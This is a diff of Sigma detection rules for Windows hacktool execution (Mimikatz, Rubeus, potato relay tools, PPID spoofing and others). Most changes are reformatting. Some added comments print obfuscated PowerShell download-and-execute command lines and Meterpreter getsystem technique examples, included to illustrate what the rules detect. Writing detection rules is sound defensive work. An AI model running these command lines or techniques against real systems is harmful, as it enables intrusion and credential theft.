description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2022/03/08 @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - set - '&&' - mshta diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml index 0ea348d84..5cfd4e5ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml @@ -3,7 +3,7 @@ id: e9f55347-2928-4c06-88e5-1a7f8169942e status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/16 @@ -20,12 +20,15 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # CommandLine|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" + CommandLine|contains|all: - '&&set' - cmd - /c - -f - CommandLine|contains: + CommandLine|contains: - '{0}' - '{1}' - '{2}' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml index 56505a581..41cf14604 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml @@ -22,21 +22,21 @@ detection: ParentCommandLine|endswith: .bat ParentProcessName|endswith: \cmd.exe selection1: - CommandLine|contains|all: + CommandLine|contains|all: - powershell.exe - .bat.exe - NewProcessName|endswith: \xcopy.exe + NewProcessName|endswith: \xcopy.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - pwsh.exe - .bat.exe - NewProcessName|endswith: \xcopy.exe + NewProcessName|endswith: \xcopy.exe selection3: - CommandLine|contains|all: + CommandLine|contains|all: - +s - +h - .bat.exe - NewProcessName|endswith: \attrib.exe + NewProcessName|endswith: \attrib.exe condition: process_creation and (parent_selection and (1 of selection*)) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml index 2ee1a0bfa..0287ae367 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_koadic.yml @@ -22,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /q - /c - chcp diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml index b03787c50..c3babf6e7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelay.yml @@ -18,20 +18,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \KrbRelay.exe - - OriginalFileName: KrbRelay.exe + - NewProcessName|endswith: \KrbRelay.exe + - OriginalFileName: KrbRelay.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -spn ' - ' -clsid ' - ' -rbcd ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - shadowcred - clsid - spn selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'spn ' - 'session ' - 'clsid ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml index b98716555..8e1130aea 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_krbrelayup.yml @@ -1,8 +1,7 @@ title: HackTool - KrbRelayUp Execution id: 12827a56-61a4-476a-a9cb-f3068f191073 status: test -description: Detects KrbRelayUp used to perform a universal no-fix local privilege - escalation in Windows domain environments where LDAP signing is not enforced +description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced references: - https://github.com/Dec0ne/KrbRelayUp author: Florian Roth (Nextron Systems) @@ -21,19 +20,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \KrbRelayUp.exe - - OriginalFileName: KrbRelayUp.exe + - NewProcessName|endswith: \KrbRelayUp.exe + - OriginalFileName: KrbRelayUp.exe # In case the file has been renamed after compilation selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' relay ' - ' -Domain ' - ' -ComputerName ' selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' krbscm ' - ' -sc ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' spawn ' - ' -d ' - ' -cn ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml index eb8ad86df..d6fe8fcdf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_localpotato.yml @@ -1,8 +1,7 @@ title: HackTool - LocalPotato Execution id: 6bd75993-9888-4f91-9404-e1e4e4e34b77 status: test -description: Detects the execution of the LocalPotato POC based on basic PE metadata - information and default CLI examples +description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples references: - https://www.localpotato.com/localpotato_html/LocalPotato.html - https://github.com/decoder-it/LocalPotato @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \LocalPotato.exe + NewProcessName|endswith: \LocalPotato.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - .exe -i C:\ - -o Windows\ selection_hash_plain: diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml index 62fffff95..57e207368 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml @@ -1,8 +1,7 @@ title: Potential Meterpreter/CobaltStrike Activity id: 15619216-e993-4721-b590-4c520615a67d status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service starting +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -23,22 +22,26 @@ detection: selection_img: ParentProcessName|endswith: \services.exe selection_technique_1: - CommandLine|contains|all: + # Examples: + # Meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + CommandLine|contains|all: - /c - echo - \pipe\ - CommandLine|contains: + CommandLine|contains: - cmd - '%COMSPEC%' selection_technique_2: - CommandLine|contains|all: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn + CommandLine|contains|all: - rundll32 - .dll,a - '/p:' filter_defender: - CommandLine|contains: MpCmdRun - condition: process_creation and (selection_img and 1 of selection_technique_* - and not 1 of filter_*) + CommandLine|contains: MpCmdRun + condition: process_creation and (selection_img and 1 of selection_technique_* and not 1 of filter_*) fields: - SubjectUserName - ComputerName diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml index a8e920520..6c973d8b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml @@ -5,8 +5,7 @@ description: Detection well-known mimikatz command line arguments references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://tools.thehacker.recipes/mimikatz/modules -author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim - Shelton +author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton date: 2019/10/22 modified: 2023/02/21 tags: @@ -24,24 +23,24 @@ detection: EventID: 4688 Channel: Security selection_tools_name: - CommandLine|contains: + CommandLine|contains: - DumpCreds - mimikatz - selection_function_names: - CommandLine|contains: - - ::aadcookie - - ::detours - - ::memssp - - ::mflt - - ::ncroutemon - - ::ngcsign - - ::printnightmare - - ::skeleton - - ::preshutdown - - ::mstsc - - ::multirdp + selection_function_names: # To cover functions from modules that are not in module_names + CommandLine|contains: + - ::aadcookie # misc module + - ::detours # misc module + - ::memssp # misc module + - ::mflt # misc module + - ::ncroutemon # misc module + - ::ngcsign # misc module + - ::printnightmare # misc module + - ::skeleton # misc module + - ::preshutdown # service module + - ::mstsc # ts module + - ::multirdp # ts module selection_module_names: - CommandLine|contains: + CommandLine|contains: - 'rpc::' - 'token::' - 'crypto::' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml index 892450bbf..e45417232 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_pchunter.yml @@ -1,8 +1,7 @@ title: HackTool - PCHunter Execution id: fca949cc-79ca-446e-8064-01aa7e52ece5 status: test -description: Detects suspicious use of PCHunter, a tool like Process Hacker to view - and manipulate processes, kernel options and other low level stuff +description: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff references: - http://www.xuetr.com/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -26,12 +25,12 @@ detection: EventID: 4688 Channel: Security selection_image: - NewProcessName|endswith: + NewProcessName|endswith: - \PCHunter64.exe - \PCHunter32.exe selection_pe: - - OriginalFileName: PCHunter.exe - - Description: Epoolsoft Windows Information View Tools + - OriginalFileName: PCHunter.exe + - Description: Epoolsoft Windows Information View Tools selection_hashes: Hashes|contains: - SHA1=5F1CBC3D99558307BC1250D084FA968521482025 @@ -43,18 +42,18 @@ detection: - SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C - IMPHASH=0479F44DF47CFA2EF1CCC4416A538663 selection_hash_values: - - md5: - - 228dd0c2e6287547e26ffbd973a40f14 - - 987b65cd9b9f4e9a1afd8f8b48cf64a7 - - sha1: - - 5f1cbc3d99558307bc1250d084fa968521482025 - - 3fb89787cb97d902780da080545584d97fb1c2eb - - sha256: - - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 - - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c - - Imphash: - - 444d210cea1ff8112f256a4997eed7ff - - 0479f44df47cfa2ef1ccc4416a538663 + - md5: + - 228dd0c2e6287547e26ffbd973a40f14 + - 987b65cd9b9f4e9a1afd8f8b48cf64a7 + - sha1: + - 5f1cbc3d99558307bc1250d084fa968521482025 + - 3fb89787cb97d902780da080545584d97fb1c2eb + - sha256: + - 2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32 + - 55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c + - Imphash: + - 444d210cea1ff8112f256a4997eed7ff + - 0479f44df47cfa2ef1ccc4416a538663 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml index 9c73bae6f..dc5e82e84 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml @@ -26,11 +26,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - /Create - powershell.exe -NonI - /TN Updater /TR - CommandLine|contains: + CommandLine|contains: - /SC ONLOGON - /SC DAILY /ST - /SC ONIDLE @@ -38,7 +38,7 @@ detection: ParentProcessName|endswith: - \powershell.exe - \pwsh.exe - NewProcessName|endswith: \schtasks.exe + NewProcessName|endswith: \schtasks.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml index 5a7ddc933..b10d7c907 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_powertool.yml @@ -1,9 +1,7 @@ title: HackTool - PowerTool Execution id: a34f79a3-8e5f-4cc3-b765-de00695452c2 status: test -description: Detects the execution of the tool PowerTool which has the ability to - kill a process, delete its process file, unload drivers, and delete the driver - files +description: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files references: - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/ - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html @@ -23,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \PowerTool.exe - - \PowerTool64.exe - - OriginalFileName: PowerTool.exe + - NewProcessName|endswith: + - \PowerTool.exe + - \PowerTool64.exe + - OriginalFileName: PowerTool.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml index bc9ac5432..ef9989c69 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \purplesharp - - OriginalFileName: PurpleSharp.exe + - NewProcessName|contains: \purplesharp + - OriginalFileName: PurpleSharp.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - xyz123456.exe - PurpleSharp condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml index a69d3c914..371f69c0b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_pypykatz.yml @@ -1,9 +1,7 @@ title: HackTool - Pypykatz Credentials Dumping Activity id: a29808fd-ef50-49ff-9c7a-59a9b040b404 status: test -description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries - may attempt to extract credential material from the Security Account Manager (SAM) - database through Windows registry where the SAM database is stored +description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored references: - https://github.com/skelsec/pypykatz - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - live - registry - NewProcessName|endswith: + NewProcessName|endswith: - \pypykatz.exe - \python.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml index 7e407d8d6..710a2afa3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_quarks_pwdump.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \QuarksPwDump.exe + NewProcessName|endswith: \QuarksPwDump.exe selection_cli: - CommandLine: + CommandLine: - ' -dhl' - ' --dump-hash-local' - ' -dhdc' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml index 170338471..124735e8e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml @@ -1,8 +1,7 @@ title: HackTool - RedMimicry Winnti Playbook Execution id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b status: test -description: Detects actions caused by the RedMimicry Winnti playbook a automated - breach emulations utility +description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility references: - https://redmimicry.com/posts/redmimicry-winnti/ author: Alexander Rausch @@ -22,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - gthread-3.6.dll - \Windows\Temp\tmp.bat - sigcmm-2.4.dll - NewProcessName|endswith: + NewProcessName|endswith: - \rundll32.exe - \cmd.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml index f08aeb361..0c3aa127b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml @@ -1,8 +1,7 @@ title: Potential SMB Relay Attack Tool Execution id: 5589ab4f-a767-433c-961d-c91f3f704db1 status: test -description: Detects different hacktools used for relay attacks on Windows for privilege - escalation +description: Detects different hacktools used for relay attacks on Windows for privilege escalation references: - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://pentestlab.blog/2017/04/13/hot-potato/ @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection_pe: - NewProcessName|contains: + NewProcessName|contains: - PetitPotam - RottenPotato - HotPotato @@ -39,22 +38,22 @@ detection: - \ntlmrelayx - \LocalPotato selection_script: - CommandLine|contains: + CommandLine|contains: - Invoke-Tater - ' smbrelay' - ' ntlmrelay' - 'cme smb ' - ' /ntlm:NTLMhash ' - Invoke-PetitPotam - - '.exe -t * -p ' - selection_juicypotato_enum: - CommandLine|contains: .exe -c "{ - CommandLine|endswith: '}" -z' - filter_hotpotatoes: - NewProcessName|contains: + - '.exe -t * -p ' # JuicyPotatoNG pattern https://github.com/antonioCoco/JuicyPotatoNG + selection_juicypotato_enum: # appears when JuicyPotatoNG is used with -b + CommandLine|contains: .exe -c "{ + CommandLine|endswith: '}" -z' + filter_hotpotatoes: # known goodware https://hotpot.uvic.ca/ + NewProcessName|contains: - HotPotatoes6 - HotPotatoes7 - - 'HotPotatoes ' + - 'HotPotatoes ' # Covers the following: 'HotPotatoes 6', 'HotPotatoes 7', 'HotPotatoes Help', 'HotPotatoes Tutorial' condition: process_creation and (1 of selection_* and not 1 of filter_*) falsepositives: - Legitimate files with these rare hacktool names diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml index f491632c1..528ab7f70 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_rubeus.yml @@ -1,11 +1,10 @@ title: HackTool - Rubeus Execution id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 related: - - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 - type: similar + - id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 + type: similar status: stable -description: Detects the execution of the hacktool Rubeus via PE information of command - line parameters +description: Detects the execution of the hacktool Rubeus via PE information of command line parameters references: - https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus - https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html @@ -27,25 +26,25 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \Rubeus.exe - - OriginalFileName: Rubeus.exe - - Description: Rubeus - - CommandLine|contains: - - 'asreproast ' - - 'dump /service:krbtgt ' - - dump /luid:0x - - 'kerberoast ' - - 'createnetonly /program:' - - 'ptt /ticket:' - - '/impersonateuser:' - - 'renew /ticket:' - - 'asktgt /user:' - - 'harvest /interval:' - - 's4u /user:' - - 's4u /ticket:' - - 'hash /password:' - - 'golden /aes256:' - - 'silver /user:' + - NewProcessName|endswith: \Rubeus.exe + - OriginalFileName: Rubeus.exe + - Description: Rubeus + - CommandLine|contains: + - 'asreproast ' + - 'dump /service:krbtgt ' + - dump /luid:0x + - 'kerberoast ' + - 'createnetonly /program:' + - 'ptt /ticket:' + - '/impersonateuser:' + - 'renew /ticket:' + - 'asktgt /user:' + - 'harvest /interval:' + - 's4u /user:' + - 's4u /ticket:' + - 'hash /password:' + - 'golden /aes256:' + - 'silver /user:' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml index 7238a5732..f038ccd00 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_safetykatz.yml @@ -1,8 +1,7 @@ title: HackTool - SafetyKatz Execution id: b1876533-4ed5-4a83-90f3-b8645840a413 status: test -description: Detects the execution of the hacktool SafetyKatz via PE information and - default Image name +description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name references: - https://github.com/GhostPack/SafetyKatz author: Nasreddine Bencherchali (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SafetyKatz.exe - - OriginalFileName: SafetyKatz.exe - - Description: SafetyKatz + - NewProcessName|endswith: \SafetyKatz.exe + - OriginalFileName: SafetyKatz.exe + - Description: SafetyKatz condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml index a56af0f0b..0ccb9f9ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_secutyxploded.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - - Company: SecurityXploded - - NewProcessName|endswith: PasswordDump.exe - - OriginalFileName|endswith: PasswordDump.exe + - Company: SecurityXploded + - NewProcessName|endswith: PasswordDump.exe + - OriginalFileName|endswith: PasswordDump.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml index dd7936043..42d77861a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_selectmyparent.yml @@ -1,8 +1,7 @@ title: HackTool - PPID Spoofing SelectMyParent Tool Execution id: 52ff7941-8211-46f9-84f8-9903efb7077d status: test -description: Detects the use of parent process ID spoofing tools like Didier Stevens - tool SelectMyParent +description: Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent references: - https://pentestlab.blog/2020/02/24/parent-pid-spoofing/ - https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks @@ -22,35 +21,35 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SelectMyParent.exe - - CommandLine|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - ' -spawnto ' - - OriginalFileName|contains: - - PPID-spoof - - ppid_spoof - - spoof-ppid - - spoof_ppid - - ppidspoof - - spoofppid - - spoofedppid - - Description: SelectMyParent - - Imphash: - - 04d974875bd225f00902b4cad9af3fbc - - a782af154c9e743ddf3f3eb2b8f3d16e - - 89059503d7fbf470e68f7e63313da3ad - - ca28337632625c8281ab8a130b3d6bad - - Hashes|contains: - - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC - - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E - - IMPHASH=89059503D7FBF470E68F7E63313DA3AD - - IMPHASH=CA28337632625C8281AB8A130B3D6BAD + - NewProcessName|endswith: \SelectMyParent.exe + - CommandLine|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - ' -spawnto ' + - OriginalFileName|contains: + - PPID-spoof + - ppid_spoof + - spoof-ppid + - spoof_ppid + - ppidspoof + - spoofppid + - spoofedppid + - Description: SelectMyParent + - Imphash: + - 04d974875bd225f00902b4cad9af3fbc + - a782af154c9e743ddf3f3eb2b8f3d16e + - 89059503d7fbf470e68f7e63313da3ad + - ca28337632625c8281ab8a130b3d6bad + - Hashes|contains: + - IMPHASH=04D974875BD225F00902B4CAD9AF3FBC + - IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E + - IMPHASH=89059503D7FBF470E68F7E63313DA3AD + - IMPHASH=CA28337632625C8281AB8A130B3D6BAD condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml index 9caed7063..928749f52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_chisel.yml @@ -1,8 +1,8 @@ title: HackTool - SharpChisel Execution id: cf93e05e-d798-4d9e-b522-b0248dc61eaf related: - - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 - type: similar + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: test description: Detects usage of the Sharp Chisel via the commandline arguments references: @@ -22,8 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \SharpChisel.exe - - Product: SharpChisel + - NewProcessName|endswith: \SharpChisel.exe + - Product: SharpChisel + # See rule 8b0e12da-d3c3-49db-bb4f-256703f380e5 for Chisel.exe coverage condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml index fdbf990ef..c07a377ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_sharp_impersonation.yml @@ -1,11 +1,10 @@ title: HackTool - SharpImpersonation Execution id: f89b08d0-77ad-4728-817b-9b16c5a69c7a related: - - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 - type: similar + - id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 + type: similar status: test -description: Detects execution of the SharpImpersonation tool. Which can be used to - manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ - https://github.com/S3cur3Th1sSh1t/SharpImpersonation @@ -25,18 +24,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SharpImpersonation.exe - - OriginalFileName: 